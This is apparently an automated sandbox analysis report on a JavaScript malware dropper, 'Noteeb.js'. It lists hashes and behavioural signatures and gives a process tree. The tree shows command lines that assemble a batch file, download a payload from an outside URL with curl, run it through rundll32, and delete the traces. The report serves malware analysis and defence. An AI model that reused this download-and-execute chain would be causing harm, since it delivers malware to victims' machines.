Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
12-12-2023 14:39
Static task
static1
Behavioral task
behavioral1
Sample
Noteeb.js
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
Noteeb.js
Resource
win10v2004-20231127-en
General
-
Target
Noteeb.js
-
Size
79KB
-
MD5
8ff33e1d1f20a1be265bd996c00d1463
-
SHA1
d01ff951755e8f2c8f9a3e3697cd3cc1e0ffae4d
-
SHA256
2dde87c739be776f15f4f269d527e3ab96429a2947c8e9cd8a51e39050ffe73a
-
SHA512
3663e9e29f73f380d6bfd2e6bd851620a100a1a8997a05df57b599f336f601e95f201cf18417fa4f5088c8a787b41af6ea5eb9a313697239e99f0f8f63245051
-
SSDEEP
1536:SepX4w2rWvddsQs2/HlAB7gKLQGwWAcViP0vW7c3Go:SoIYAUgxW7c3Go
Malware Config
Signatures
-
Deletes itself 1 IoCs
Processes:
cmd.exepid process 2588 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
wscript.execmd.exedescription pid process target process PID 2928 wrote to memory of 2588 2928 wscript.exe cmd.exe PID 2928 wrote to memory of 2588 2928 wscript.exe cmd.exe PID 2928 wrote to memory of 2588 2928 wscript.exe cmd.exe PID 2928 wrote to memory of 2664 2928 wscript.exe cmd.exe PID 2928 wrote to memory of 2664 2928 wscript.exe cmd.exe PID 2928 wrote to memory of 2664 2928 wscript.exe cmd.exe PID 2664 wrote to memory of 2596 2664 cmd.exe cmd.exe PID 2664 wrote to memory of 2596 2664 cmd.exe cmd.exe PID 2664 wrote to memory of 2596 2664 cmd.exe cmd.exe PID 2664 wrote to memory of 2752 2664 cmd.exe cmd.exe PID 2664 wrote to memory of 2752 2664 cmd.exe cmd.exe PID 2664 wrote to memory of 2752 2664 cmd.exe cmd.exe PID 2928 wrote to memory of 2284 2928 wscript.exe cmd.exe PID 2928 wrote to memory of 2284 2928 wscript.exe cmd.exe PID 2928 wrote to memory of 2284 2928 wscript.exe cmd.exe PID 2928 wrote to memory of 2556 2928 wscript.exe cmd.exe PID 2928 wrote to memory of 2556 2928 wscript.exe cmd.exe PID 2928 wrote to memory of 2556 2928 wscript.exe cmd.exe PID 2928 wrote to memory of 2468 2928 wscript.exe cmd.exe PID 2928 wrote to memory of 2468 2928 wscript.exe cmd.exe PID 2928 wrote to memory of 2468 2928 wscript.exe cmd.exe PID 2928 wrote to memory of 2604 2928 wscript.exe cmd.exe PID 2928 wrote to memory of 2604 2928 wscript.exe cmd.exe PID 2928 wrote to memory of 2604 2928 wscript.exe cmd.exe PID 2928 wrote to memory of 2440 2928 wscript.exe rundll32.exe PID 2928 wrote to memory of 2440 2928 wscript.exe rundll32.exe PID 2928 wrote to memory of 2440 2928 wscript.exe rundll32.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Noteeb.js1⤵
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c echo|set /p="cu" > "C:\Users\Admin\AppData\Local\Temp\culpa.j.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /p="cu" 1>"C:\Users\Admin\AppData\Local\Temp\culpa.j.bat""3⤵PID:2752
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo"3⤵PID:2596
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\culpa.j.bat"2⤵PID:2556
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\quo.z" iure.h2⤵PID:2604
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\iure.h" Enter2⤵PID:2440
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\culpa.j.bat"2⤵PID:2468
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c echo rl "https://lorented.com/gf4/199960121" --output "C:\Users\Admin\AppData\Local\Temp\quo.z" --ssl-no-revoke --insecure --location >> "C:\Users\Admin\AppData\Local\Temp\culpa.j.bat"2⤵PID:2284
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\Noteeb.js"2⤵
- Deletes itself
PID:2588
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
133B
MD55e9c9b3cdbfd5f0440a7f6a2f9277e98
SHA1edae3ba46ba0f07ce715c97a266c661c8668862f
SHA256933eb418352ae7ed45c41566dc89c279239f11ede47300011d559108fe92620a
SHA5122e5405bea1204e41b1f67989a5bfca7c0beb6d776a1f81db5fd53f57d57f9fbbe6aa35a6eb3251523d9d656aa134ec697f3191589d553e69858aac55c185c843